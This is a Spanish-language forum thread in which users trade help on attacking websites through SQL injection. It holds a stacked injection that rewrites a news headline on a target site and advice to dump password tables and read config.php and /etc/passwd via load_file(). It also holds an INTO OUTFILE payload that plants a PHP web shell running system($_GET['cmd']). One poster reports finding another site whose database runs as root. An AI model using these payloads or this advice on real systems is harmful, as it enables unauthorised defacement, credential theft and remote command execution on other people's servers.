http://victima.com/noticias.php?id=1;update noticias set
titular=concat(char(0x4c),char(0x69),char(0x63),char(0x65),char(0x79),char(0x20),char(0x43),
char(0x61),char(0x6d),char(0x70),char(0x65),char(0x6f),char(0x6e)) where id_noticia= 131/*

este es el query

You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ';update noticias settitular=concat(char(0x4c),char(0x69),char(0

este es el error lo que no entiendo es por que no corre

hola,

no creo que puedas lograr eso. Lo primero seria sacar datos de la base de datos con UNION SELECT y ver analizando si hay una tabla de passwords. Ademas reconoce que sistema e intenta volcar los contenidos de ficheros importantes, tal vez config.php o /etc/passwd con la función load_file()

saludos,

Si, si eso esta bien... pero porque tienes que usar todos esos caracateres en concat??? 

Simplemente puedes juntar la notacion hexadecimal de cada caracter de "/etc/passwd"


Asi quedaria:


 

gracias por la ayuda el usuario que genera es este estrella_dbuser@localhost pero de igual manera no me deja ver los archivos! no tiene permisos!

Pero tambien encontre otra web esta ves el user es root@localhost perfecto!
Ya puedo leer los archivos y todo pero no puedo crear un archivo usando INTO OUTFILE
creo que el problema esta en las comilla me puede alguien decir como se hace el INTO OUTFILE  o un buen manual.

UNION SELECT 1,'<?php system($_GET['cmd']); ?>',3,4,5,6 INTO OUTFILE '/text.php'/*

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\',3,4,5,6 INTO OUTFILE \'/text.php\'/*' at line 1

gracias por adelantado!

Pues gracias Azielito y a los demas entonces tendre que buscar una web q tenga el magic quote off